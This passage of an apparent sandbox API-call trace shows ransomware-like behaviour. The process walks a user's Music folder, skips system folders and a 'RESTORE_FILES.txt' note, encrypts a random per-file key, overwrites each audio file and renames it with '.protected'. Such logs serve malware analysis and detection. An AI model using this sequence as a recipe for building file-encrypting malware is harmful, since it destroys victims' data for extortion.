lpOverlapped=0x0) returned 1 [0092.337] CloseHandle (hObject=0xd8) returned 1 [0092.337] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="Windows") returned -1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="Program Files") returned -1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="Program Files (x86)") returned -1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="$Recycle.bin") returned 1 [0092.337] lstrcmpiW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="System Volume Information") returned -1 [0092.337] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrIW (lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".protected") returned 0x0 [0092.337] lstrcmpW (lpString1="G4dWpihHhNCBwg9gGY.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.337] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.337] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\g4dwpihhhncbwg9ggy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrW 
(lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".txt") returned 0x0 [0092.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrW (lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".rar") returned 0x0 [0092.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav") returned 95 [0092.337] StrStrW (lpFirst="G4dWpihHhNCBwg9gGY.wav", lpSrch=".zip") returned 0x0 [0092.337] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.338] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.338] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.338] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.338] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.338] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.338] CloseHandle (hObject=0xd8) returned 1 [0092.338] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav.protected") returned 105 [0092.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\g4dwpihhhncbwg9ggy.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\G4dWpihHhNCBwg9gGY.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\g4dwpihhhncbwg9ggy.wav.protected")) returned 1 [0092.339] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="Windows") returned -1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="Program Files") returned -1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="Program Files (x86)") returned -1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="$Recycle.bin") returned 1 [0092.339] lstrcmpiW (lpString1="L51YiqIaemJw.mp3", lpString2="System Volume Information") returned -1 [0092.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.339] StrStrIW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".protected") returned 0x0 [0092.339] lstrcmpW (lpString1="L51YiqIaemJw.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\l51yiqiaemjw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.340] StrStrW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".txt") returned 0x0 [0092.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.340] StrStrW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".rar") returned 0x0 [0092.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3") returned 89 [0092.340] StrStrW (lpFirst="L51YiqIaemJw.mp3", lpSrch=".zip") returned 0x0 [0092.340] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.340] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.340] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.341] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.341] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) 
returned 1 [0092.341] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.341] CloseHandle (hObject=0xd8) returned 1 [0092.341] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3.protected") returned 99 [0092.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\l51yiqiaemjw.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\L51YiqIaemJw.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\l51yiqiaemjw.mp3.protected")) returned 1 [0092.341] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="Windows") returned -1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="Program Files") returned -1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="Program Files (x86)") returned -1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="$Recycle.bin") returned 1 [0092.341] lstrcmpiW (lpString1="Lo3A5.wav", lpString2="System Volume Information") returned -1 [0092.341] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.341] StrStrIW (lpFirst="Lo3A5.wav", lpSrch=".protected") returned 0x0 [0092.342] lstrcmpW (lpString1="Lo3A5.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.342] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c 
| out: pbBuffer=0x295ec4c) returned 1 [0092.342] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\lo3a5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.342] StrStrW (lpFirst="Lo3A5.wav", lpSrch=".txt") returned 0x0 [0092.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.342] StrStrW (lpFirst="Lo3A5.wav", lpSrch=".rar") returned 0x0 [0092.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav") returned 82 [0092.342] StrStrW (lpFirst="Lo3A5.wav", lpSrch=".zip") returned 0x0 [0092.342] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.343] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.343] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.343] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0092.343] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.343] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.343] CloseHandle (hObject=0xd8) returned 1 [0092.343] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav.protected") returned 92 [0092.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\lo3a5.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\Lo3A5.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\lo3a5.wav.protected")) returned 1 [0092.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="Windows") returned -1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="Program Files") returned -1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="Program Files (x86)") returned -1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="$Recycle.bin") returned 1 [0092.344] lstrcmpiW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="System Volume Information") returned -1 [0092.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrIW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".protected") returned 0x0 [0092.344] lstrcmpW (lpString1="p51dwRs KCBjaCu.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\p51dwrs kcbjacu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".txt") returned 0x0 [0092.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".rar") returned 0x0 [0092.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a") returned 92 [0092.344] StrStrW (lpFirst="p51dwRs KCBjaCu.m4a", lpSrch=".zip") returned 0x0 [0092.344] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.345] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.345] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.345] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.345] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.345] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.345] CloseHandle (hObject=0xd8) returned 1 [0092.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a.protected") returned 102 [0092.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\p51dwrs kcbjacu.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\p51dwRs KCBjaCu.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\p51dwrs kcbjacu.m4a.protected")) returned 1 [0092.346] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="Windows") returned -1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", 
lpString2="Program Files") returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="Program Files (x86)") returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="$Recycle.bin") returned 1 [0092.346] lstrcmpiW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="System Volume Information") returned -1 [0092.346] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.346] StrStrIW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".protected") returned 0x0 [0092.346] lstrcmpW (lpString1="S_Y9KCvVsjeCtMDtCE.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0092.346] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.346] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\s_y9kcvvsjectmdtce.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.347] StrStrW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".txt") returned 0x0 [0092.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.347] StrStrW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".rar") returned 0x0 [0092.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a") returned 95 [0092.347] StrStrW (lpFirst="S_Y9KCvVsjeCtMDtCE.m4a", lpSrch=".zip") returned 0x0 [0092.347] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.348] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.348] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.348] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.348] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.348] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.348] CloseHandle (hObject=0xd8) returned 1 [0092.348] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a.protected") returned 105 [0092.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\S_Y9KCvVsjeCtMDtCE.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\s_y9kcvvsjectmdtce.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
